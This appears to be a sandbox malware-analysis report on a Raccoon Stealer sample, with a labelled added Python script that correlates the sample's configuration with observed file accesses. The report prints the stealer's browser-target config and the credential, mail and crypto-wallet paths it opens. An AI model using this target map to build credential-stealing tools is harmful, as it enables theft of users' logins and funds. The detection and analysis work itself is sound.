Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F7819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_001FEFDD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: eLZzxG56uH.exe, 00000000.00000002.314134323.00000000016DE000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021C559 IsDebuggerPresent,OutputDebugStringW, 0_2_0021C559
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_001F49A2
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021A03D mov eax, dword ptr fs:[00000030h] 0_2_0021A03D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021A0B2 mov eax, dword ptr fs:[00000030h] 0_2_0021A0B2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021A081 mov eax, dword ptr fs:[00000030h] 0_2_0021A081
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_00206C01 mov eax, dword ptr fs:[00000030h] 0_2_00206C01
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_00206625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00206625
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_00200EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00200EDC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetLocaleInfoW, 0_2_002229F7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00222B1D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetLocaleInfoW, 0_2_00218BA4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00222391
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetLocaleInfoW, 0_2_00222C23
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00222CF2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: EnumSystemLocalesW, 0_2_00218577
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: GetLocaleInfoW, 0_2_0022258C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: EnumSystemLocalesW, 0_2_00222633
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: EnumSystemLocalesW, 0_2_0022267E
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: EnumSystemLocalesW, 0_2_00222719
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FE03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_001FE03E
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F71FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 0_2_001F71FA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001EA2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_001EA2F9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F7819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_001F7819

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0_2_001F592B
Found many strings related to Crypto-Wallets (likely being stolen)
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314121729.00000000016D2000.00000004.00000020.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
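The configuration blob dumped under "Found many strings related to Crypto-Wallets" lists the browser targets as ';'-separated entries, and the "File opened" lines above show which Chrome files the sample actually touched. The following is an added example, not code from the sample, the sandbox or this report: it parses entries in that format (number; display name; path under the profile directory; file names) and correlates them with observed file-access paths, so an analyst can see which configured targets a run exercised and which file accesses fall outside the browser list. The field layout is inferred from the dump; the leading numeric field ("28") is not explained anywhere in the report and is carried through unchanged. Both the config subset and the telemetry lines are constructed from the report's own entries (the report's copy of the blob is truncated).

```python
"""Correlate Raccoon-style browser-target config entries with file-access telemetry.

Added example (not the sample's or sandbox's code). Entry format, as inferred
from the dumped configuration:
    "<number>;<display name>;<path under the profile dir>;<file>;<file>;..."
The leading number is not explained by the report and is kept as an opaque tag.
"""
from __future__ import annotations

import json
import ntpath  # Windows path semantics regardless of the host OS

# Constructed subset of the dumped "s" array (same format, shortened).
SAMPLE_CONFIG = json.dumps({
    "is_screen_enabled": 1,
    "is_history_enabled": 0,
    "depth": 3,
    "s": [
        {"k": "edge", "v": "28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},
        {"k": "chrome", "v": "28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},
        {"k": "brave", "v": "28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},
        {"k": "torbro", "v": "28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},
    ],
})

# Constructed telemetry modelled on the report's "File opened" lines.
SAMPLE_EVENTS = [
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
]


def parse_target(entry: dict) -> dict:
    """Split one {"k": ..., "v": ...} entry into its fields; reject short entries."""
    fields = entry["v"].split(";")
    if len(fields) < 4:
        raise ValueError(f"malformed target {entry['k']!r}: {entry['v']!r}")
    return {
        "key": entry["k"],
        "tag": fields[0],                 # opaque; meaning not given in the report
        "name": fields[1],
        "root": fields[2].strip("\\"),    # e.g. Google\Chrome\User Data
        "files": fields[3:],              # e.g. ["Login Data", "Cookies", "Web Data"]
    }


def parse_config(blob: str) -> list[dict]:
    """Parse the JSON blob and return the browser-target list."""
    cfg = json.loads(blob)
    return [parse_target(e) for e in cfg.get("s", [])]


def match_event(path: str, targets: list[dict]) -> dict | None:
    """Return the target whose root directory and file list cover this path, if any.

    The root must appear as whole path components (bounded by backslashes) so
    that 'Google\\Chrome\\User Data' does not match 'Google\\Chrome Beta\\User Data'.
    The per-profile subdirectory ('Default', 'Profile 1', ...) may sit between
    the root and the file, so only containment is required, not adjacency.
    """
    directory, filename = ntpath.split(path.lower())
    haystack = directory + "\\"
    for t in targets:
        needle = "\\" + t["root"].lower() + "\\"
        if needle in haystack and filename in (f.lower() for f in t["files"]):
            return t
    return None


def correlate(blob: str, events: list[str]) -> dict:
    """Map observed file accesses onto config targets.

    Returns which targets were hit (and with which files), which events matched
    no browser target (candidates for wallet/mail paths), and which configured
    targets the run never touched.
    """
    targets = parse_config(blob)
    hits: dict[str, list[str]] = {}
    unmatched: list[str] = []
    for ev in events:
        t = match_event(ev, targets)
        if t is None:
            unmatched.append(ev)
        else:
            hits.setdefault(t["key"], []).append(ntpath.basename(ev))
    untouched = [t["key"] for t in targets if t["key"] not in hits]
    return {"hits": hits, "unmatched_events": unmatched, "untouched_targets": untouched}


if __name__ == "__main__":
    print(json.dumps(correlate(SAMPLE_CONFIG, SAMPLE_EVENTS), indent=2))
```

With the constructed inputs only the "chrome" target is hit (Web Data, Cookies, Login Data); the Exodus wallet path is reported as an unmatched event because it is not a browser target, and edge, brave and torbro are listed as configured but untouched. Feeding real file-access telemetry from the sandbox run in place of SAMPLE_EVENTS turns this into a quick check of how much of the configured target list a given execution actually reached.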

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR